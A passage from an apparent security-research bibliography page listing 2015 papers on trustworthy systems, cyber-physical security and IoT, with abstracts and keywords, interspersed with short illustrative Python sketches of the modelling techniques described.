Abstract: Globally, it has been ascertained that the implementation of software quality assurance practices throughout the software development cycle yields quality software products that satisfy the user and meet specified requirements. The awareness and adoption of these techniques has recorded an increase in the quality and patronage of software products. However, in developing countries like Nigeria, indigenously produced software is not patronized by large corporations, such as banks for their financial portfolios, or even the government. This research investigated the software quality assurance practices of practitioners in Nigeria, and the challenges faced in implementing software quality, in a bid to improve the quality and patronage of software. It was observed that while most practitioners claim to adhere to software quality practices, they barely have an understanding of software quality standards, and a vast majority do not have a distinct software quality assurance team to enforce quality. The core challenges inhibiting the practice of these software quality standards have also been identified. The research has helped to reveal some issues within the industry, for which possible solutions have been proffered.

Keywords: human factors; quality assurance; software development management; software process improvement; software quality; software standards; Nigeria; developing countries; software development cycle; software quality assurance practices; software quality assurance team; software quality improvement; user satisfaction; Companies; Planning; Software quality; Standards organizations; software; software quality; software quality assurance; software quality challenges (ID#: 16-9425)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363169&isnumber=7362962

 

J. Morris-King and H. Cam, "Ecology-Inspired Cyber Risk Model for Propagation of Vulnerability Exploitation in Tactical Edge," Military Communications Conference, MILCOM 2015 - 2015 IEEE, Tampa, FL, 2015, pp. 336-341. doi: 10.1109/MILCOM.2015.7357465

Abstract: A multitude of cyber vulnerabilities on the tactical edge arise from the mix of network infrastructure, physical hardware and software, and individual user-behavior. Because of the inherent complexity of socio-technical systems, most models of tactical cyber assurance omit the non-physical influence propagation between mobile systems and users. This omission leads to a question: how can the flow of influence across a network act as a proxy for assessing the propagation of risk? Our contribution toward solving this problem is to introduce a dynamic, adaptive ecosystem-inspired model of vulnerability exploitation and risk flow over a tactical network. This model is based on ecological characteristics of the tactical edge, where the heterogeneous characteristics and behaviors of human-machine systems enhance or degrade mission risk in the tactical environment. Our approach provides an in-depth analysis of vulnerability exploitation propagation and risk flow using a multi-agent epidemic model which incorporates user-behavior and mobility as components of the system. This user-behavior component is expressed as a time-varying parameter driving a multi-agent system. We validate this model by conducting a synthetic battlefield simulation, where performance results depend mainly on the level of functionality of the assets and services. The composite risk score is shown to be proportional to infection rates from the Standard Epidemic Model.

Keywords: human factors; military communication; mobile ad hoc networks; multi-agent systems; telecommunication computing; telecommunication network reliability; time-varying systems; dynamic adaptive ecosystem-inspired model; ecology-inspired cyber risk model; human-machine systems; mobile systems; mobile users; multiagent epidemic model; nonphysical influence propagation; risk flow; risk propagation; socio-technical system complexity; synthetic battlefield simulation; tactical cyber assurance; tactical edge; tactical network; time-varying parameter; user-behavior; vulnerability exploitation propagation; Biological system modeling; Computational modeling; Computer security; Ecosystems; Risk management; Timing; Unified modeling language; Agent-based simulation; Ecological modeling; Epidemic system; Risk propagation; Tactical edge network (ID#: 16-9426)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357465&isnumber=7357245
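
The core mechanic behind such epidemic risk models can be illustrated with a minimal SIS-style sketch, in which compromise spreads along network edges at a rate driven by a time-varying user-behavior parameter. Everything below — topology, rates, and the risk proxy — is invented for illustration and is not taken from the paper.

import random

def step(infected, neighbors, beta_t, recovery=0.1):
    """One SIS step: compromise spreads along edges with probability beta_t;
    compromised nodes are remediated with the given probability."""
    new_infected = set(infected)
    for node in infected:
        for nbr in neighbors[node]:
            if nbr not in infected and random.random() < beta_t:
                new_infected.add(nbr)
        if random.random() < recovery:
            new_infected.discard(node)
    return new_infected

def beta(t):
    # Time-varying user-behavior parameter: riskier behavior during work hours.
    return 0.15 if t % 24 in range(8, 18) else 0.05

neighbors = {0: [1, 2], 1: [0, 2], 2: [0, 1, 3], 3: [2]}
infected = {0}
for t in range(48):
    infected = step(infected, neighbors, beta(t))
print("risk proxy (compromised fraction):", len(infected) / len(neighbors))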


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Trustworthy Systems 2015

 

 
SoS Logo

Trustworthy Systems 2015

 

Trust is created in information security to assure the identity of external parties. Trustworthy systems are a key element in the security, resiliency, and composability of cyber-physical systems. The research cited here was presented in 2015.


H. Orojloo and M. A. Azgomi, "Evaluating The Complexity And Impacts Of Attacks on Cyber-Physical Systems," Real-Time and Embedded Systems and Technologies (RTEST), 2015 CSI Symposium on, Tehran, 2015, pp. 1-8. doi: 10.1109/RTEST.2015.7369840

Abstract: In this paper, a new method for quantitative evaluation of the security of cyber-physical systems (CPSs) is proposed. The proposed method models the different classes of adversarial attacks against CPSs, including cross-domain attacks, i.e., cyber-to-cyber and cyber-to-physical attacks. It also takes the secondary consequences of attacks on CPSs into consideration. The intrusion process of attackers has been modeled using an attack graph, and the consequence estimation process of the attack has been investigated using a process model. The security attributes and the special parameters involved in the security analysis of CPSs have been identified and considered. The quantitative evaluation has been done using the probability of attacks, the time-to-shutdown of the system, and security risks. The validation phase of the proposed model is performed as a case study by applying it to a boiling water power plant and estimating suitable security measures.

Keywords: cyber-physical systems; estimation theory; graph theory; probability; security of data; CPS; attack graph; attack probability; consequence estimation process; cross-domain attack; cyber-physical system security; cyber-to-cyber attack; cyber-to-physical attack; security attributes; security risks; time-to-shutdown; Actuators; Computer crime; Cyber-physical systems; Process control; Sensor phenomena and characterization; Cyber-physical systems; attack consequences; modeling; quantitative security evaluation (ID#: 16-9427)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7369840&isnumber=7369836
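
The quantitative flavor of attack-graph evaluation can be sketched briefly: treat exploits as edges with success probabilities and score each cyber-to-physical path by the product of its steps (independence assumed). The graph, node names, and probabilities below are illustrative stand-ins, not the paper's model.

def paths(graph, src, dst, prob=1.0, seen=()):
    """Enumerate (probability, path) pairs from src to dst."""
    if src == dst:
        yield prob, seen + (dst,)
        return
    for nxt, p in graph.get(src, []):
        if nxt not in seen:
            yield from paths(graph, nxt, dst, prob * p, seen + (src,))

# Nodes are attacker privilege states; edge weights are assumed exploit
# success probabilities (none of these numbers come from the paper).
graph = {
    "internet": [("hmi", 0.6)],        # initial cyber foothold
    "hmi":      [("plc", 0.4)],        # cyber-to-cyber escalation
    "plc":      [("actuator", 0.7)],   # cyber-to-physical consequence
}
best = max(paths(graph, "internet", "actuator"))
print("most likely path:", " -> ".join(best[1]), "p =", round(best[0], 3))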

 

K. G. Lyn, L. W. Lerner, C. J. McCarty and C. D. Patterson, "The Trustworthy Autonomic Interface Guardian Architecture for Cyber-Physical Systems," Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, Liverpool, 2015, pp. 1803-1810. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.263

Abstract: The growing connectivity of cyber-physical systems (CPSes) has led to an increased concern over the ability of cyber-attacks to inflict physical damage. Current cyber-security measures focus on preventing attacks from penetrating control supervisory networks. These reactive techniques, however, are often plagued with vulnerabilities and zero-day exploits. Embedded processors in CPS field devices often possess little security of their own, and are easily exploited once the network is penetrated. We identify four possible outcomes of a cyber-attack on a CPS embedded processor. We then discuss five trust requirements that a device must satisfy to guarantee correct behavior through the device's lifecycle. Next, we examine the Trustworthy Autonomic Interface Guardian Architecture (TAIGA) which monitors communication between the embedded controller and physical process. This autonomic architecture provides the physical process with a last line of defense against cyber-attacks. TAIGA switches process control to a trusted backup controller if an attack causes a system specification violation. We conclude with experimental results of an implementation of TAIGA on a hazardous cargo-carrying robot.

Keywords: cyber-physical systems; trusted computing; CPS embedded processor; TAIGA; cyber-attacks; cyber-physical systems; cyber-security measures; embedded controller; physical process; reactive techniques; trusted backup controller; trustworthy autonomic interface guardian architecture; Control systems; Process control; Program processors; Sensors; Trojan horses; Cyber-physical systems; autonomic control; embedded device security; resilience; trust (ID#: 16-9428)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363316&isnumber=7362962
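
TAIGA's last-line-of-defense behavior amounts to monitoring commands against a system specification and failing over to a trusted backup controller on violation. A minimal sketch of that switching logic follows; the signal names and limits are invented, and the real TAIGA runs in hardware-isolated logic rather than Python.

SPEC = {"valve_pct": (0, 100), "temp_setpoint": (20, 90)}  # assumed limits

def violates_spec(cmd):
    lo, hi = SPEC[cmd["signal"]]
    return not (lo <= cmd["value"] <= hi)

def guardian(cmd, primary_trusted, backup_controller):
    """Pass the primary controller's command through unless it violates the
    specification; otherwise switch control to the trusted backup."""
    if primary_trusted and not violates_spec(cmd):
        return cmd, primary_trusted
    return backup_controller(cmd), False   # primary no longer trusted

def backup(cmd):
    # Conservative backup policy: clamp to the specification envelope.
    lo, hi = SPEC[cmd["signal"]]
    return {**cmd, "value": max(lo, min(hi, cmd["value"]))}

cmd, trusted = guardian({"signal": "valve_pct", "value": 250}, True, backup)
print(cmd, "trusted primary:", trusted)   # clamped to 100, failover engaged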

 

Xiaohong Chen, Fan Gu, Mingsong Chen, Dehui Du, Jing Liu and Haiying Sun, "Evaluating Energy Consumption for Cyber-Physical Energy System: An Environment Ontology-Based Approach," Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, Taichung, 2015, pp. 5-14. doi: 10.1109/COMPSAC.2015.114

Abstract: Energy consumption evaluation is one of the most important steps in Cyber-Physical Energy System (CPES) development. However, due to the lack of accurate and effective modeling and evaluation approaches that consider the uncertainty of the environment, it is hard to conduct quantitative analysis of the energy consumption of CPESs. To address this issue, this paper proposes an environment-aware energy consumption evaluation framework based on Statistical Model Checking (SMC). In our framework, the environment uncertainty of CPESs is modeled using Stochastic Hybrid Automata (SHA). In order to describe various environment modeling patterns, we create a collection of parameterized SHA models and save them to a domain-specific environment ontology. Based on the domain environment ontology and user designs in the form of UML sequence diagrams and activity diagrams, our framework can automatically guide the construction of CPES models using networks of SHA and conduct the corresponding energy consumption evaluation. A case study based on an energy-aware building design demonstrates that our approach can not only support accurate environment modeling with various uncertain factors, but can also be used to reason about the relations between the energy consumption and environment uncertainties of CPES designs.

Keywords: energy consumption; power system management; power system security; statistical analysis; stochastic automata; CPES development; SMC; UML sequence diagram; cyber physical energy system; energy aware building design; energy consumption evaluation; environment ontology based approach; environment uncertainty; environment-aware energy consumption; parameterized SHA models; statistical model checking; stochastic hybrid automata; Energy consumption; Monitoring; Ontologies; Synchronization; Temperature measurement; Uncertainty; Unified modeling language; Cyber-Physical Energy Systems; Environment Ontology; Statistical Model Checking; Stochastic Hybrid Automata (SHA); Uncertainty of Environment (ID#: 16-9429)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273590&isnumber=7273573
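
Statistical model checking, as used here, boils down to sampling many runs of a stochastic model and estimating the probability that a property holds. The toy building model below is an invented stand-in for the paper's stochastic hybrid automata — the distributions, setpoint, and kWh coefficients are all assumptions — and is only meant to show the sampling loop.

import random

def simulate_day():
    """One random run of a toy building-energy model under environment
    uncertainty (all parameters are illustrative assumptions)."""
    outside_temp = random.gauss(15, 5)          # uncertain environment
    occupancy = random.randint(0, 20)           # uncertain usage
    hvac = max(0.0, 22 - outside_temp) * 1.5    # kWh to hold a 22 C setpoint
    plug_loads = occupancy * 0.8                # kWh per occupant, assumed
    return hvac + plug_loads

runs = 10000
exceed = sum(simulate_day() > 30.0 for _ in range(runs))
print("estimated P(daily energy > 30 kWh) ~", exceed / runs)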

 

Bei Cheng, Xiao Wang, Jufu Liu and Dehui Du, "Modana: An Integrated Framework for Modeling and Analysis of Energy-Aware CPSs," Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, Taichung, 2015, pp. 127-136. doi: 10.1109/COMPSAC.2015.68

Abstract: Cyber-Physical Systems (CPSs), as advanced embedded systems integrating computation with physical processes, are increasingly penetrating our lives. Modeling and analysis of such systems are actively researched. A current challenging problem is how to take advantage of existing technologies like SysML/MARTE, Modelica and Statistical Model Checking (SMC) through effective integration. Moreover, the lack of efficient methodologies or tools for modeling and analysis of CPSs makes the gap between design and analysis models hard to bridge. To solve these problems, we present a framework named Modana to achieve an integrated process, from modeling with SysML/MARTE to analysis with SMC, for CPSs in terms of Non-Functional Properties (NFPs) such as time, energy, etc. The Functional Mock-up Interface (FMI), as a connecting link between modeling and analysis, plays a major role in coordinating various tools for co-simulation to generate traces as the input of the statistical model checker. To demonstrate the capability of the Modana framework, we model energy-aware buildings as a case study, and discuss the analysis of energy consumption in different scenarios.

Keywords: embedded systems; formal verification; power aware computing; statistical analysis; FMI; Modana; Modelica; NFP; SMC; SysML/MARTE; cyber-physical systems; embedded systems; energy consumption; energy-aware CPS analysis; energy-aware CPS modeling; energy-aware buildings; functional mock-up interface; integrated framework; integrated process; nonfunctional properties; statistical model checking; system analysis; system modeling; Analytical models; Computational modeling; Libraries; Mathematical model; Object oriented modeling; Stochastic processes; Unified modeling language; SysML/MARTE; cyber-physical systems; energy-aware buildings; functional mock-up interface; statistical model checking (ID#: 16-9430)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273610&isnumber=7273573

 

Tai-Won Um, Gyu Myoung Lee and Jun Kyun Choi, "Strengthening Trust in the Future ICT Infrastructure," ITU Kaleidoscope: Trust in the Information Society (K-2015), 2015, Barcelona, 2015, pp. 1-8.  doi: 10.1109/Kaleidoscope.2015.7383628

Abstract: Moving towards a hyperconnected society in the forthcoming "zettabyte" era requires a trusted ICT infrastructure for sharing information and creating knowledge. To advance the efforts to build converged ICT services and reliable information infrastructures, ITU-T has recently started a work item on future trusted ICT infrastructures. In this paper, we introduce the concept of a social-cyber-physical infrastructure from the social Internet of Things paradigm and present its different meanings from various perspectives for a clear understanding of trust. Then, the paper identifies key challenges for a trustworthy ICT infrastructure. Finally, we propose a generic architectural framework for trust provisioning and present strategies to stimulate activities for future standardization on trust with the related standardization bodies.

Keywords: standardisation; trusted computing; ITU-T; converged ICT services; information and communication technology; social Internet-of-Things paradigm; social-cyber-physical infrastructure; standardization; trust provisioning; trusted ICT infrastructure; zettabyte era; Cloud computing; Interconnected systems; Internet of things; Reliability; Security; Standardization; Telecommunications; ICT; Internet of Things; Trust; social-cyber-physical infrastructure (ID#: 16-9431)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7383628&isnumber=7383613

 

Jin-Hee Han, Yongsung Jeon and Jeongnyeo Kim, "Security Considerations for Secure and Trustworthy Smart Home System in the IoT Environment," Information and Communication Technology Convergence (ICTC), 2015 International Conference on, Jeju, 2015, pp. 1116-1118. doi: 10.1109/ICTC.2015.7354752

Abstract: Recently, smart home appliances and wearable devices have been developed by many companies. Most devices interact with various sensors and have communication functions to connect to the Internet by themselves. These devices will provide a wide range of services to users through a mutual exchange of information. However, due to the nature of the IoT environment, appropriate security functions for secure and trustworthy smart home services should be applied extensively, because security threats will increase and their impact is likely to expand. Therefore, in this paper, we describe specifically the security requirements of the components that make up the smart home system.

Keywords: Internet; Internet of Things; computer network security; home automation; trusted computing; Internet; IoT environment; information mutual exchange; secure smart home system; security threat; smart home appliance; trustworthy smart home system; wearable device; Authentication; Data privacy; Internet of things; Logic gates; Servers; Smart homes; IoT; requirements; security; smart home system (ID#: 16-9432)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7354752&isnumber=7354472

 

A. A. Gendreau, "Situation Awareness Measurement Enhanced for Efficient Monitoring in the Internet of Things," Region 10 Symposium (TENSYMP), 2015 IEEE, Ahmedabad, 2015, pp. 82-85. doi: 10.1109/TENSYMP.2015.13

Abstract: The Internet of Things (IoT) is a heterogeneous network of objects that communicate with each other and their owners over the Internet. In the future, the utilization of distributed technologies in combination with their object applications will result in an unprecedented level of knowledge and awareness, creating new business opportunities and expanding existing ones. However, in this paradigm, where almost everything can be monitored and tracked, an awareness of the state of the monitoring systems' situation will be important. Despite the anticipated scale of business opportunities resulting from new object monitoring and tracking capabilities, IoT adoption has not been as fast as expected. The reason for the slow growth of application objects is the immaturity of the standards, which can be partly attributed to their unique system requirements and characteristics. In particular, the IoT standards must exhibit efficient self-reliant management and monitoring capability, which in a hierarchical topology is the role of cluster heads. IoT standards must be robust, scalable, adaptable, reliable, and trustworthy. These criteria are predicated upon the limited lifetime, and the autonomous nature, of wireless personal area networks (WPANs), of which wireless sensor networks (WSNs) are a major technological solution and research area in the IoT. In this paper, the energy efficiency of a self-reliant management and monitoring WSN cluster-head selection algorithm, previously used for situation awareness, was improved upon by sharing particular established application cluster heads. This enhancement saved energy and reporting time by reducing the path length to the monitoring node. Also, a proposal to enhance the risk assessment component of the model is made. We demonstrate through experiments that, when benchmarked against both a power-based and a randomized cluster-head deployment, the proposed enhancement to the situation awareness metric used less power. Potentially, this approach can be used to design a more energy-efficient cluster-based management and monitoring algorithm for the advancement of security, e.g. intrusion detection systems (IDSs), and other standards in the IoT.

Keywords: Internet of Things; personal area networks; security of data; wireless sensor networks; Internet of Things; WPAN; WSN; distributed technologies; efficient self-reliant management and monitoring capability; heterogeneous network; object monitoring and tracking capabilities; situation awareness measurement; situation awareness metric; wireless personal area networks; wireless sensor networks; Energy efficiency; Internet of things; Monitoring; Security; Standards; Wireless sensor networks; Internet of Things; Intrusion detection system; Situational awareness; Wireless sensor networks (ID#: 16-9433)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166243&isnumber=7166213
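
The cluster-head selection theme can be illustrated with a LEACH-flavored sketch in which nodes with more residual energy are proportionally more likely to serve as heads in a given round. The paper's situation-awareness metric and head-sharing enhancement go well beyond this, and the election formula below is an assumption for illustration only.

import random

def elect_heads(nodes, desired_fraction=0.1):
    """nodes: {node_id: residual_energy}. Nodes with more residual energy
    are proportionally more likely to serve as cluster heads this round;
    the expected number of heads is desired_fraction * len(nodes)."""
    total = sum(nodes.values())
    heads = [n for n, e in nodes.items()
             if random.random() < desired_fraction * len(nodes) * e / total]
    return heads or [max(nodes, key=nodes.get)]  # always elect at least one

nodes = {f"s{i}": random.uniform(0.2, 1.0) for i in range(50)}
print("cluster heads this round:", elect_heads(nodes))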

 

R. Gupta and R. Garg, "Mobile Applications Modelling and Security Handling in Cloud-Centric Internet of Things," Advances in Computing and Communication Engineering (ICACCE), 2015 Second International Conference on, Dehradun, 2015, pp. 285-290. doi: 10.1109/ICACCE.2015.119

Abstract: Mobile Internet of Things (IoT) applications are already a part of the technical world. The integration of these applications with the Cloud can increase storage capacity and help users to collect and process their personal data in an organized manner. There are a number of techniques adopted for sensing, communicating and intelligently transmitting data from mobile devices onto the Cloud in IoT applications. Thus, security must be maintained during transmission. The paper outlines the need for Cloud-centric IoT applications using mobile phones as the medium for communication. An overview of different techniques to use mobile IoT applications with the Cloud is presented. Four major techniques, namely the Mobile Sensor Data Processing Engine (MOSDEN), Mobile Fog, Embedded Integrated Systems (EIS) and Dynamic Configuration using Mobile Sensor Hub (MosHub), are discussed, and a few of the similarities and comparisons between them are mentioned. Confidentiality and security of the data being transmitted by these methodologies must be maintained; therefore, cryptographic mechanisms like Public Key Encryption (PKI) and digital certificates are used for data management, and TSCM allows trustworthy sensing of data for the public in IoT applications. We used the above technologies to implement an application called Smart Helmet, to bring a better understanding of the concept of Cloud IoT and support Assisted Living for the betterment of society. The application makes use of Nordic BLE board transmission and stores data onto the Cloud to be used by a large number of people.

Keywords: Internet of Things; cloud computing; data acquisition; embedded systems; mobile computing; public key cryptography; trusted computing; EIS; MOSDEN; MosHub; Nordic BLE board transmission; PKI; Smart Helmet; TSCM; assisted living;cloud-centric Internet of Things; cloud-centric IoT applications; communication; cryptographic mechanisms; data confidentiality; data management; data mechanisms; data security; data transmission; digital certificates; dynamic configuration; embedded integrated systems; mobile Internet of Things; mobile IoT applications; mobile applications modelling; mobile devices; mobile fog; mobile phones; mobile sensor data processing engine; mobile sensor hub; personal data collection; personal data processing; public key encryption; security handling; sensing; storage capacity; trustworthy data; Bluetooth; Cloud computing; Mobile applications; Mobile communication; Mobile handsets; Security; Cloud IoT; Embedded Integrated Systems; Internet of Things; Mobile Applications; Mobile Sensor Data Processing Engine; Mobile Sensor Hub; Nordic BLE board; Public Key Encryption; Smart Helmet (ID#: 16-9434)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7306695&isnumber=7306547
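
The cryptographic mechanism the abstract invokes — public-key encryption of sensor data before upload — might look like the following hybrid-encryption sketch using the Python cryptography package. The paper itself targets Android and Bluetooth; the key sizes, payload, and field names here are placeholders.

# Requires the 'cryptography' package (pip install cryptography).
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.fernet import Fernet

# Cloud side publishes an RSA key pair (generated inline for demonstration).
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Device side: encrypt the reading with a fresh symmetric key, then wrap
# that key for the cloud with RSA-OAEP.
session_key = Fernet.generate_key()
ciphertext = Fernet(session_key).encrypt(b'{"helmet_id": 7, "impact_g": 3.2}')
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(session_key, oaep)

# Cloud side: unwrap the session key and decrypt the reading.
recovered = Fernet(private_key.decrypt(wrapped_key, oaep)).decrypt(ciphertext)
assert recovered == b'{"helmet_id": 7, "impact_g": 3.2}'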

 

B. Mok et al., "Emergency, Automation Off: Unstructured Transition Timing for Distracted Drivers of Automated Vehicles," Intelligent Transportation Systems (ITSC), 2015 IEEE 18th International Conference on, Las Palmas, 2015, pp. 2458-2464. doi: 10.1109/ITSC.2015.396

Abstract: In future automated driving systems, drivers will be free to perform other secondary tasks, not needing to stay vigilant in monitoring the car's activity. However, there will still be situations in which drivers are required to take over control of the vehicle, most likely from a highly distracted state. While highly automated vehicles would ideally accommodate structured takeovers, providing ample time and warning, it is still very important to examine how drivers behave when they are subjected to an unstructured emergency transition of control. In this study, we observed how participants (N=30) in a driving simulator performed after they experienced a loss of automation. We tested three transition time conditions, with an unstructured transition of control occurring 2 seconds, 5 seconds, or 8 seconds before the participants encountered a road hazard that required the drivers' intervention. Participants were given a passive distraction (watching a video) while the automated driving mode was enabled, so they needed to disengage from the task and regain control of the car when the transition occurred. Few drivers in the 2-second condition were able to safely negotiate the road hazard situation, while the majority of drivers in the 5- and 8-second conditions were able to navigate the hazard safely. Similarly, drivers in the 2-second condition rated the vehicle to be less trustworthy than drivers in the 5- and 8-second conditions. From the study results, we are able to narrow down the minimum amount of time in which drivers can take over control of the vehicle safely and comfortably from the automated system in the event of an impending road hazard.

Keywords: automobiles; digital simulation; driver information systems ;traffic engineering computing; automated driving systems; automated vehicles; distracted drivers; driving simulator; passive distraction; road hazard situation; transition time conditions; unstructured emergency transition; unstructured transition timing; vehicle control; Automation; Hazards; Poles and towers; Roads; Standards; Vehicles; Wheels; Autonomous Driving Simulation; Controlled Study; Driving Performance; Human Factors; Transition of Control (ID#: 16-9435)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7313488&isnumber=7312804

 

M. Shiomi and N. Hagita, "Social Acceptance of a Childcare Support Robot System," Robot and Human Interactive Communication (RO-MAN), 2015 24th IEEE International Symposium on, Kobe, 2015, pp. 13-18. doi: 10.1109/ROMAN.2015.7333658

Abstract: This paper investigates people's social acceptance of a childcare support robot system and compares their attitudes toward two existing childcare technologies: anesthesia during labor, and baby food (processed food and formula milk), which includes powdered milk and instant food for babies and toddlers. To investigate social acceptance, we developed scales from three points of view: safety and trustworthiness, diligence, and decreasing workload. Our participants comprised 412 people reached through a web-based survey and 14 people who experienced the prototype of our childcare support robot system. They answered questionnaires based on our three developed scales and an intention-to-use scale to investigate their social acceptance of childcare support technologies. The web-based survey results indicate that our system's concept was evaluated lower than current childcare support technologies, but people who experienced our system prototype evaluated it higher than those who filled out web-based surveys.

Keywords: human factors; human-robot interaction; medical robotics; service robots; anesthesia; baby food; childcare support robot system; childcare support technologies; childcare technologies; instant food for babies; people social acceptance; powdered milk; social acceptance; toddlers; Anesthesia; Dairy products; Pediatrics; Prototypes; Robot sensing systems; Safety (ID#: 16-9436)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7333658&isnumber=7333553

 

L. Gu, M. Zhou, Z. Zhang, M. C. Shan, A. Zhou and M. Winslett, "Chronos: An Elastic Parallel Framework for Stream Benchmark Generation and Simulation," Data Engineering (ICDE), 2015 IEEE 31st International Conference on, Seoul, 2015, pp. 101-112. doi: 10.1109/ICDE.2015.7113276

Abstract: In the coming big data era, stress testing IT systems under extreme data volume is crucial to the adoption of computing technologies in every corner of the cyber world. Appropriately generated benchmark datasets give administrators the possibility to evaluate the capacity of their systems when real datasets, which are hard to obtain, do not cover extreme cases. Traditional benchmark data generators, however, mainly target producing relation tables of arbitrary size following fixed distributions. The output of such generators is insufficient for measuring the stability of an architecture under extremely dynamic and heavy workloads, caused by complicated/hidden factors in the generation mechanisms of the real world, e.g. dependency between stocks in the trading market and collaborative human behaviors on social networks. In this paper, we present a new framework, called Chronos, to support new demands on streaming data benchmarking by generating and simulating realistic and fast data streams in an elastic manner. Given a small group of samples with timestamps, Chronos reproduces new data streams with similar characteristics to the samples, preserving column-wise correlations, temporal dependency and order statistics of the snapshot distributions at the same time. To achieve such realistic requirements, we propose 1) a column decomposition optimization technique to partition the original relation table into small sub-tables with minimal correlation information loss, 2) a generative and extensible model based on Latent Dirichlet Allocation to capture temporal dependency while preserving order statistics of the snapshot distribution, and 3) a new generation and assembling method to efficiently build tuples following the expected distribution on the snapshots. To fulfill the vision of elasticity, we also present a new parallel stream data generation mechanism, facilitating distributed nodes to collaboratively generate tuples with minimal synchronization overhead and excellent load balancing. Our extensive experimental studies on real-world data domains confirm the efficiency and effectiveness of Chronos for stream benchmark generation and simulation.

Keywords: Big Data; optimisation; parallel processing; program assemblers; resource allocation; Big Data; Chronos framework; IT systems; assembling method; benchmark data generators; collaborative human behaviors; column decomposition optimization technique; column-wise correlations; cyber world; elastic parallel framework; extreme data volume; fast data streams; latent Dirichlet allocation; load balancing; minimal correlation information loss; minimal synchronization overhead; order statistics; parallel stream data generation mechanism; snapshot distributions; social network; stream benchmark generation; temporal dependency; timestamps; trading market; Benchmark testing; Complexity theory; Computational modeling; Correlation; Distributed databases; Generators (ID#: 16-9437)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113276&isnumber=7113253
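
Chronos's column decomposition can be caricatured in a few lines: group columns whose pairwise correlation is strong, so each sub-table keeps correlated columns together. The greedy grouping and the 0.6 threshold below are assumptions; the paper formulates this as an optimization with minimal correlation information loss.

import numpy as np

def decompose(table, threshold=0.6):
    """Greedily group columns of a numeric table whose absolute pairwise
    correlation meets the threshold; returns lists of column indices."""
    corr = np.abs(np.corrcoef(table, rowvar=False))
    groups, assigned = [], set()
    for i in range(corr.shape[0]):
        if i in assigned:
            continue
        group = [i] + [j for j in range(i + 1, corr.shape[0])
                       if j not in assigned and corr[i, j] >= threshold]
        assigned.update(group)
        groups.append(group)
    return groups

rng = np.random.default_rng(0)
x = rng.normal(size=1000)
table = np.column_stack([x, x + 0.1 * rng.normal(size=1000),
                         rng.normal(size=1000)])
print(decompose(table))   # e.g. [[0, 1], [2]]: columns 0 and 1 stay together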

 

R. A. Earnshaw, M. D. Silva and P. S. Excell, "Ten Unsolved Problems with the Internet of Things," 2015 International Conference on Cyberworlds (CW), Visby, 2015, pp. 1-7. doi: 10.1109/CW.2015.28

Abstract: It is estimated that by 2020 the Internet of Things, with embedded and wearable computing, will have a major impact on society and be providing beneficial services in a wide variety of applications. It has already accomplished some cost savings in operations and increases in asset efficiency. Increased connectivity and improved safety, security, and reliability are expected to increase potential value in a range of applications from healthcare to transportation. As much of the technology is embedded and invisible, it can take the role of a smart assistant working away autonomously and unobtrusively in the background. However, automatic monitoring of activities brings increased potential for invasion of personal spaces and personal data. There are significant issues in a number of areas which still have to be addressed in order to ensure safe, reliable and trustworthy systems. A prototype funded by the UK Technology Strategy Board demonstrates the value and advantages of business-to-business collaboration via the Internet. It also emphasizes the benefits of connectivity and its contribution to sustainability.

Keywords: Internet of Things; business data processing; data privacy; security of data; trusted computing; UK Technology Strategy Board; Internet; Internet of Things; asset efficiency; automatic activity monitoring; business-to-business collaboration; connectivity improvement; cost saving; personal data; personal spaces; reliability improvement; safety improvement; security improvement; smart assistant; Collaboration; Companies; Internet of things; Monitoring; Real-time systems; big data; business to business collaboration; embedded systems; implanted devices; interoperability; latency; open standards; predictive analytics; privacy; real-time monitoring; security; trust; visual analytics (ID#: 16-9438)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7398383&isnumber=7398373

 

T. Fadai, S. Schrittwieser, P. Kieseberg and M. Mulazzani, "Trust me, I'm a Root CA! Analyzing SSL Root CAs in Modern Browsers and Operating Systems," Availability, Reliability and Security (ARES), 2015 10th International Conference on, Toulouse, 2015, pp. 174-179. doi: 10.1109/ARES.2015.93

Abstract: The security and privacy of our online communications heavily rely on the entity authentication mechanisms provided by SSL. Those mechanisms in turn heavily depend on the trustworthiness of a large number of companies and governmental institutions for attestation of the identity of SSL service providers. In order to offer wide and unobstructed availability of SSL-enabled services, and to remove the need to make a large number of trust decisions from their users, operating systems and browser manufacturers include lists of certification authorities which are trusted for SSL entity authentication by their products. This has the problematic effect that users of such browsers and operating systems implicitly trust those certification authorities with the privacy of their communications while they might not even realize it. The problem is further complicated by the fact that different software vendors trust different companies and governmental institutions, from a variety of countries, which leads to an obscure distribution of trust. To give insight into the trust model used by SSL, this paper explains the various entities and technical processes involved in establishing trust when using SSL communications. It furthermore analyzes the number and origin of companies and governmental institutions trusted by various operating system and browser vendors, and correlates the gathered information with a variety of indexes to illustrate that some of these trusted entities are far from 